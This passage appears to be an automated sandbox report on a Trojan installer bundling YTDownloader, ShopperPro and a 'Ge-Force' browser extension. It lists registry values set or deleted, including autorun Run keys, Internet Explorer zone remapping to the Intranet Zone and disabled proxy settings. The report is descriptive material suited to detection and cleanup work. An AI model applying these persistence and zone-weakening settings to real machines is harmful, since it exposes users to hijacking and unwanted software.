"Seed" = "8C 8E 36 EF 8A 90 86 7B BD FA 10 21 2C F6 7D 2C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process setup.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1189"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 27 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4996-b722-50633741fbe4,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4996-b722-50633741fbe4,"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E CF 20 AD FF 2A 49 99 2A 08 EE 0F D1 97 44 BC"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1189"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj6.tmp]
"setup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process setup.exe:3256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 92 56 3F 2B A0 D6 BB DF 2F 2D 04 B7 59 BE 7B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb9.tmp\AccDownload.dll,"

The process Smskc.exe:3904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 65 67 4B 87 F8 13 E0 D2 72 9D DB E9 10 61 43"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process net1.exe:3800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB B9 D6 AC A6 18 43 A9 DA 00 42 C1 DF 9D 5E 78"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process net1.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 D8 6D 60 0F CF E2 3D 1F 1E 5A FC 6C 3E FE E1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process tcpsvcs.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
